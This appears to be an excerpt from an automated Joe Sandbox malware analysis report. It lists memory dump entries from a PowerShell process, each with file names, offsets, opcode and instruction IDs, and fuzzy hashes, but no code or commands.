                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: t(q
                                              • API String ID: 0-3080623236
                                              • Opcode ID: 4ae15071fa6919d9540c6894f5af3dd2a5d15e95c1b82a5ca469c1ff35b72ce0
                                              • Instruction ID: d03ea3b77e1477a818f4c3938271cd9061cb31f2a9a7ffa233c09f558251847c
                                              • Opcode Fuzzy Hash: 4ae15071fa6919d9540c6894f5af3dd2a5d15e95c1b82a5ca469c1ff35b72ce0
                                              • Instruction Fuzzy Hash: 25A3E974E012599FEB54DF64CC54BDEB7B2EB89300F0045E9910DAB294DB39AE82DF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: t(q
                                              • API String ID: 0-3080623236
                                              • Opcode ID: c84b76d58d1e70af574630794a05bcefe20800796ac2d022e8f1fd53f8604d02
                                              • Instruction ID: e6e0493be4ceb1b3929c89ca63ce11c81df7ecbb7194ffa9143231ccc2999036
                                              • Opcode Fuzzy Hash: c84b76d58d1e70af574630794a05bcefe20800796ac2d022e8f1fd53f8604d02
                                              • Instruction Fuzzy Hash: 60A3E974E012599FEB54DF64CC54BDEB7B2EB89300F0045E9910DAB294DB39AE82DF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H(q
                                              • API String ID: 0-797520398
                                              • Opcode ID: 3441ad7c43c32d1f9bc030a9d1b04a089805853cb33939f4e06d618bb1d2bb23
                                              • Instruction ID: 5ce39a86078b0b0f2cca32fd106a463cc60d2d608097664a750a93fc566a0621
                                              • Opcode Fuzzy Hash: 3441ad7c43c32d1f9bc030a9d1b04a089805853cb33939f4e06d618bb1d2bb23
                                              • Instruction Fuzzy Hash: 06B23C34A012189FEB55EF64CC51BDEBBB2EF89301F1085E9D509AB250DB359E82DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 6360cb9ba73d468b812ff0cb4f49e4a98f62a48aba0c146799fef881f4fa9068
                                              • Instruction ID: a7d13428441a65bf1906a2f43c3e2ecbf3808aa0d5e2ee9d153642800e079a77
                                              • Opcode Fuzzy Hash: 6360cb9ba73d468b812ff0cb4f49e4a98f62a48aba0c146799fef881f4fa9068
                                              • Instruction Fuzzy Hash: D812F634A00218DFEB24DBB5D854A6E7BBAEBC8602F15846DD506EB395DA34EC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04deb715e63c92ea047c7bb0d530e38614ed0d758be490d2c23e57fb5c58f04d
                                              • Instruction ID: 4b3e0d55323c59f1155c251e36970c84c0b7710cccfea1000c8adc8e92425c35
                                              • Opcode Fuzzy Hash: 04deb715e63c92ea047c7bb0d530e38614ed0d758be490d2c23e57fb5c58f04d
                                              • Instruction Fuzzy Hash: FA92EC35B01314DFDB69AB34C811BAD77A3AF86305F6088BDD209AF391DE769981DB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84ff7daa87307fd143dba0190b9533644ae5d97375ea5bf213d89ee6ce1776bb
                                              • Instruction ID: 0252c55a2c41505261eb788ef77ed4a8a2b499b2f9bbd27d202c9fc040c88aa2
                                              • Opcode Fuzzy Hash: 84ff7daa87307fd143dba0190b9533644ae5d97375ea5bf213d89ee6ce1776bb
                                              • Instruction Fuzzy Hash: E1920974B002158FDB54DF68D894BAEB7F6EF88211F1085A9D90AEB365DA30ED42CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e92a58f14a3bfb6fc574b8bb6d1716c93a470047b21c6a60401a1375031638b
                                              • Instruction ID: aeb2dfc7d563e5c32db94b95a519d99941ebb6ea37ba65955fb41cbc891c563e
                                              • Opcode Fuzzy Hash: 0e92a58f14a3bfb6fc574b8bb6d1716c93a470047b21c6a60401a1375031638b
                                              • Instruction Fuzzy Hash: DA824C34B002158FDB44DF68C894A6EBBB2FFC8715B1585A9D506DB3A5DB34EC42CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity